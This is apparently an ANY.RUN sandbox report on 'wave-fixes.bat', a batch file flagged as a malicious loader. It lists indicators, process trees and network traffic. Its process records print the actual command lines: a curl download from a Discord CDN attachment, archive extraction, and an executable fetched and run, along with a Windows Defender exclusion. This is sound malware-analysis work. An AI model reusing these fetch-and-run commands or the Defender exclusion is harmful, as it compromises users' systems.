File name:

wave-fixes.bat

Full analysis: https://app.any.run/tasks/3a0f2c03-c28d-4361-8e33-411aad971903
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: May 30, 2025, 02:56:59
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
discord
payload
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with CRLF line terminators
MD5:

CD6874847B186973474AE32AA1F9D2F0

SHA1:

C0DE8A0753737B107027FFF2E53EEB51BCA52577

SHA256:

6A09D3DC13A6D819F4196AB7C197633AEDD970DF832BACC33DE33A3DDA894457

SSDEEP:

48:NK6S+DdkMRRtbqwgtctzns6ZI5RjjfsLSdfVZIJKKSQiF6oFERC:e+DHRrpga+6+PkyZI4KXiF6ZRC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes Windows Defender settings

      • cmd.exe (PID: 7660)
      • powershell.exe (PID: 7724)

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 7660)
      • powershell.exe (PID: 7724)

  • SUSPICIOUS

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 7660)
      • powershell.exe (PID: 7724)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 7724)
      • cmd.exe (PID: 7660)

    • Application launched itself

      • powershell.exe (PID: 7724)
      • cmd.exe (PID: 7660)

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 7976)

    • Starts process via Powershell

      • powershell.exe (PID: 7724)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 7976)

    • The executable file from the user directory is run by the CMD process

      • WaveInstaller.exe (PID: 4228)
      • WaveInstaller.exe (PID: 2384)
      • WaveInstaller.exe (PID: 7268)

    • Discord domain found in command line (probably downloading payload)

      • curl.exe (PID: 7308)

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 7280)

    • Reads security settings of Internet Explorer

      • WaveInstaller.exe (PID: 7268)

    • Executing commands from a ".bat" file

      • cmd.exe (PID: 7660)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 7660)

  • INFO

    • Disables trace logs

      • powershell.exe (PID: 7976)
      • WaveInstaller.exe (PID: 7268)

    • Checks proxy server information

      • powershell.exe (PID: 7976)
      • WaveInstaller.exe (PID: 7268)
      • slui.exe (PID: 8100)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7924)
      • powershell.exe (PID: 7280)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7924)
      • powershell.exe (PID: 7280)

    • Reads the computer name

      • curl.exe (PID: 7308)
      • WaveInstaller.exe (PID: 7268)
      • curl.exe (PID: 7324)

    • Reads the machine GUID from the registry

      • WaveInstaller.exe (PID: 7268)

    • Checks supported languages

      • curl.exe (PID: 7324)
      • curl.exe (PID: 7308)
      • WaveInstaller.exe (PID: 7268)

    • Execution of CURL command

      • cmd.exe (PID: 7660)

    • Reads the software policy settings

      • WaveInstaller.exe (PID: 7268)
      • slui.exe (PID: 8100)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
140
Monitored processes
15
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe conhost.exe no specs powershell.exe waveinstaller.exe no specs waveinstaller.exe no specs waveinstaller.exe curl.exe powershell.exe no specs cmd.exe no specs conhost.exe no specs curl.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
2148cmd /c "cd VisualC++ && call install_all.bat"C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
2384"C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe" C:\Users\admin\AppData\Local\Temp\WaveInstaller.execmd.exe
User:
admin
Integrity Level:
MEDIUM
Description:
WaveInstaller
Exit code:
3221226540
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\temp\waveinstaller.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
4228"C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe" C:\Users\admin\AppData\Local\Temp\WaveInstaller.execmd.exe
User:
admin
Integrity Level:
MEDIUM
Description:
WaveInstaller
Exit code:
3221226540
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\temp\waveinstaller.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
5248\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7268"C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe" C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe
cmd.exe
User:
admin
Integrity Level:
HIGH
Description:
WaveInstaller
Exit code:
1
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\temp\waveinstaller.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
7280powershell Expand-Archive -Path Visual-C-Runtimes-All-in-One-May-2024.zip -DestinationPath VisualC++C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
7308curl -o Visual-C-Runtimes-All-in-One-May-2024.zip "https://cdn.discordapp.com/attachments/801960895658983429/1262309228140433408/Visual-C-Runtimes-All-in-One-May-2024.zip?ex=66962094&is=6694cf14&hm=2fd48ea988a8d1cf9d388adcc897b8f3ccd74481aabb52d72d52476fdc9adeec&"C:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
7324curl -o node-v20.15.0-x64.msi "https://nodejs.org/dist/v20.15.0/node-v20.15.0-x64.msi"C:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
7660C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\wave-fixes.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
7668\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
28 219
Read events
28 205
Write events
14
Delete events
0

Modification events

(PID) Process:(7268) WaveInstaller.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7268) WaveInstaller.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7268) WaveInstaller.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(7268) WaveInstaller.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(7268) WaveInstaller.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(7268) WaveInstaller.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(7268) WaveInstaller.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(7268) WaveInstaller.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7268) WaveInstaller.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7268) WaveInstaller.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
1
Suspicious files
4
Text files
8
Unknown types
0

Dropped files

PID
Process
Filename
Type
7724powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_f2kfdk03.oru.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7924powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_h534h2pe.bk0.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7924powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xl5nl5dr.nyd.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7976powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jdf23drl.y0g.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7724powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ntza0ugf.gte.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7924powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10cc79.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
7976powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sdzbxcal.ms2.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7280powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_35cb1utl.ut0.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7280powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fnacwggh.n03.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7724powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:A6C0C5DC8E2F4AEA9D192A0C64F10871
SHA256:08E882CDAD663E59AFFDD456D49A07C4D662B9A2BD12E28736120B15FFFCA1C7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
23
TCP/UDP connections
48
DNS requests
19
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
4.175.87.197:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
compressed
23.9 Kb
whitelisted
GET
302
172.183.192.203:443
https://www.nuget.org/api/v2/package/chromiumembeddedframework.runtime.win-x86/124.3.8
unknown
html
232 b
whitelisted
GET
304
4.175.87.197:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
unknown
GET
200
104.26.5.10:443
https://cdn.getwave.gg/WaveInstaller.exe
unknown
executable
2.27 Mb
unknown
GET
2.16.183.203:443
https://globalcdn.nuget.org/packages/chromiumembeddedframework.runtime.win-x86.124.3.8.nupkg?packageVersion=124.3.8
unknown
unknown
7684
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
7684
SIHClient.exe
GET
200
2.16.164.24:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
7684
SIHClient.exe
GET
200
2.16.164.24:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
whitelisted
7684
SIHClient.exe
GET
200
2.16.164.24:80
http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl
unknown
whitelisted
7684
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
7976
powershell.exe
104.26.5.10:443
cdn.getwave.gg
CLOUDFLARENET
US
unknown
7308
curl.exe
162.159.130.233:443
cdn.discordapp.com
CLOUDFLARENET
whitelisted
7324
curl.exe
104.20.23.46:443
nodejs.org
CLOUDFLARENET
shared
7684
SIHClient.exe
4.175.87.197:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7268
WaveInstaller.exe
172.183.192.203:443
www.nuget.org
MICROSOFT-CORP-MSN-AS-BLOCK
DE
whitelisted
7268
WaveInstaller.exe
2.19.126.162:443
globalcdn.nuget.org
Akamai International B.V.
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
google.com
  • 142.250.185.142
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
cdn.getwave.gg
  • 104.26.5.10
  • 172.67.73.39
  • 104.26.4.10
unknown
cdn.discordapp.com
  • 162.159.130.233
  • 162.159.133.233
  • 162.159.134.233
  • 162.159.135.233
  • 162.159.129.233
whitelisted
nodejs.org
  • 104.20.23.46
  • 104.20.22.46
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
www.nuget.org
  • 172.183.192.203
whitelisted
globalcdn.nuget.org
  • 2.19.126.162
  • 2.19.126.132
whitelisted
crl.microsoft.com
  • 2.16.164.24
  • 2.16.164.106
  • 2.16.164.9
  • 2.16.164.18
  • 2.16.164.99
whitelisted

Threats

PID
Process
Class
Message
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Misc activity
ET INFO Request for EXE via Powershell
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
2196
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discordapp .com)
7308
curl.exe
Misc activity
ET INFO Observed Discord Domain (discordapp .com in TLS SNI)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
wave-fixes.bat